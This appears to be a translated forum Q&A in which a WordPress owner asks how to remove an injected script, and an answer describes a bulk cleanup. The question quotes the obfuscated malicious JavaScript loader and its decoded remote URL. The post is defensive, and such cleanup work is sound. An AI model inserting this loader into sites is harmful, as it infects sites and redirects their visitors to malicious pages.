删除 Wordpress 上每个文档开头的两行 JS 代码

Question

我的网站正在重定向到一个恶意网站，我发现每个页面的开头都有一个代码。见下文 -

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl; 

我把这个翻译成这个 -

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=060 s.src=pl; 

但此代码存在于每个 Javascript 文件、index.php 和许多其他 PHP 文件中。我怎样才能摆脱这个重定向我的页面的脚本？

我尝试了几件事，但没有任何效果。此外，我无法登录到 WordPress 仪表板，因为 URL 将继续重定向。无论我使用什么URL，我总是以重定向结束。

请帮我解决这个问题。我现在已经尝试了一个多星期，但没有取得任何成果。

Answer 1

在本地下载您的文件。

使用 Notepad++ "Find in files"（CTRL+SHIFT+F 在文件中查找）做大量查找和替换。您可以一次对每个文件执行此操作，然后重新上传您的文件。使用我在此处的屏幕截图中设置的设置。

在您的防火墙中阻止 URL 不会有什么坏处。

另外，如果您在根目录下看到这个文件，请将其删除：wp-craft-report-conf.php